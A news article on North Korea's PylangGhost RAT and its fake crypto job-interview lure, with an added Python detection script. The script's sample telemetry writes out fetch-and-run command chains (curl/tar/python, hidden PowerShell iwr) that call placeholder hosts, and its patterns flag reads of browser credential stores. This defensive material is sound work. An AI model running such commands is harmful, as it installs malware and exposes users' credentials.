Cybercriminals Target Crypto Job Seekers with Fake Interviews Using New Trojan PylangGhost

The North Korean threat group Famous Chollima has added a new Trojan, PylangGhost, to its toolkit. According to researchers from Cisco Talos, the malware is delivered through fake job interviews aimed at professionals in the cryptocurrency sector.

The attackers create fraudulent websites that mimic well-known companies such as Coinbase, Robinhood, and Uniswap.

Fake recruiters direct applicants to these sites for a skills assessment. Candidates are then asked to turn on their camera for a video interview and are instructed to paste a command into a terminal that supposedly installs a video driver; in reality the command downloads and launches the malware. This "paste this command to fix your camera" step is the red flag: no legitimate hiring site needs a candidate to run shell commands.

PylangGhost is a remote access Trojan (RAT) written in Python and built for Windows. It is a functional counterpart of the previously documented GolangGhost RAT, which targets macOS. Linux systems are not targeted in these campaigns.

Once executed, the RAT gives the operators remote control over the compromised system. It harvests session cookies and stored credentials and targets the data of more than 80 browser extensions, including password managers such as 1Password and NordPass and cryptocurrency wallets such as MetaMask, Phantom, Bitski, and TronLink.
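The two behaviours described above, a single pasted command that fetches and runs a payload, and a non-browser process reading browser cookie and extension stores, are both visible in ordinary endpoint telemetry. The following detection sketch is an added example, not code from the Talos report or from the article: the log format, file paths, command lines, the host names under `example.invalid` and the 32-character extension ID are all constructed for this example, and the rules are generic heuristics rather than signatures for PylangGhost itself.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample telemetry (not real logs). One event per line, fields
# separated by '|': timestamp|kind|user|image|detail
#   kind=proc -> detail is the command line of the new process
#   kind=file -> detail is the path the process read
# Hosts under example.invalid and the extension ID are placeholders.
SAMPLE_EVENTS = r"""
2025-06-18T10:12:05Z|proc|alice|C:\Windows\System32\cmd.exe|cmd.exe /c curl -sL https://assessment.example.invalid/camera_driver.zip -o %TEMP%\cd.zip && tar -xf %TEMP%\cd.zip -C %TEMP% && %TEMP%\cd\python.exe %TEMP%\cd\setup.py
2025-06-18T10:13:40Z|proc|alice|C:\Users\alice\AppData\Local\Temp\cd\python.exe|python.exe setup.py
2025-06-18T10:13:41Z|file|alice|C:\Users\alice\AppData\Local\Temp\cd\python.exe|C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abcdefghijklmnopabcdefghijklmnop\000003.log
2025-06-18T10:13:42Z|file|alice|C:\Users\alice\AppData\Local\Temp\cd\python.exe|C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
2025-06-18T11:02:11Z|proc|bob|C:\Windows\System32\cmd.exe|cmd.exe /c pip install requests
2025-06-18T11:05:00Z|file|bob|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
2025-06-18T11:20:00Z|proc|bob|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c "iwr https://cdn.example.invalid/fix.zip -OutFile $env:TEMP\fix.zip; Expand-Archive $env:TEMP\fix.zip $env:TEMP\fix; & $env:TEMP\fix\run.vbs"
"""


@dataclass
class Event:
    ts: str
    kind: str    # "proc" or "file"
    user: str
    image: str   # full path of the acting process
    detail: str  # command line (proc) or file path (file)


@dataclass
class Finding:
    ts: str
    user: str
    rule: str
    evidence: str


def parse_events(text: str) -> List[Event]:
    """Parse the constructed pipe-separated format; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, user, image, detail = line.split("|", 4)
        events.append(Event(ts, kind, user, image, detail))
    return events


URL = re.compile(r"https?://", re.I)
# Common fetch tools on Windows: curl/wget, PowerShell iwr, certutil, BITS.
DOWNLOADER = re.compile(
    r"\b(curl|wget|iwr|invoke-webrequest|certutil|bitsadmin|start-bitstransfer)\b", re.I)
# Things that unpack or execute what was just fetched.
RUNNER = re.compile(
    r"(\btar\s+-x|expand-archive|\bpythonw?(\.exe)?\b|\b(wscript|cscript|mshta)\b|\.vbs\b|\.py\b)", re.I)
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData\\Local\\Temp)\\", re.I)
# Chromium profile artefacts: per-extension LevelDB store, cookie DB, saved logins.
BROWSER_STORE = re.compile(
    r"\\Local Extension Settings\\|\\(Network\\)?Cookies$|\\Login Data$", re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_download_and_execute(e: Event) -> bool:
    """One command line that names a URL, a fetch tool and an unpack/run step."""
    return e.kind == "proc" and bool(
        URL.search(e.detail) and DOWNLOADER.search(e.detail) and RUNNER.search(e.detail))


def rule_interpreter_from_temp(e: Event) -> bool:
    """A Python interpreter started from a user-writable directory, not an install path."""
    return e.kind == "proc" and basename(e.image).startswith("python") and bool(
        USER_WRITABLE.search(e.image))


def rule_browser_store_access(e: Event) -> bool:
    """A process other than a browser reading cookie, login or extension storage."""
    return e.kind == "file" and basename(e.image) not in BROWSERS and bool(
        BROWSER_STORE.search(e.detail))


RULES = [
    ("download_and_execute", rule_download_and_execute),
    ("interpreter_from_temp", rule_interpreter_from_temp),
    ("browser_store_access", rule_browser_store_access),
]


def scan(events: List[Event]) -> List[Finding]:
    findings = []
    for e in events:
        for name, rule in RULES:
            if rule(e):
                findings.append(Finding(e.ts, e.user, name, e.detail))
    return findings


if __name__ == "__main__":
    for f in scan(parse_events(SAMPLE_EVENTS)):
        print(f.ts, f.user, f.rule, f.evidence[:80])
```

The point of the first rule is the combination: a URL, a downloader and an execution step in one command line is what a pasted "driver install" looks like, whereas `pip install` or a plain `curl` does not trip it. The third rule deliberately does not enumerate wallet extension IDs; any non-browser process reading `Local Extension Settings` or the cookie database is worth a look, which also covers extensions the report does not name. Running the script prints five findings for the constructed events: the pasted `curl`/`tar`/`python` chain, the interpreter launched from `%TEMP%`, the two browser-store reads by that interpreter, and the PowerShell `iwr`/`Expand-Archive` chain. Chrome reading its own cookie file is not flagged.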

The malware also establishes persistence, so the operators keep remote access to the infected system long after the "interview" has ended.

Judging from the code, the researchers consider it unlikely that the authors used large language models to write the malware.

The victims identified so far are primarily professionals in India. Experts see this as part of a broader North Korean strategy: the group not only siphons funds from exchanges but also seeks to infiltrate cryptocurrency companies to gather intelligence.

Dilip Kumar, director of Digital South Trust, stated to Decrypt that to combat such incidents, “India must implement mandatory cybersecurity audits for blockchain companies and monitor fake job search portals.”

“CERT-In should issue red alerts, while MEITY and NCIIPC need to enhance global coordination in tackling cross-border cybercrime,” he noted.

Kumar also urged “strengthening the legal provisions” under the Information Technology Act and conducting “campaigns to raise digital awareness.”

It is worth noting that in April, researchers at Silent Push reported that a Lazarus-linked cluster tracked as Contagious Interview had registered three shell companies to distribute malware, luring victims through the same fake-interview scheme.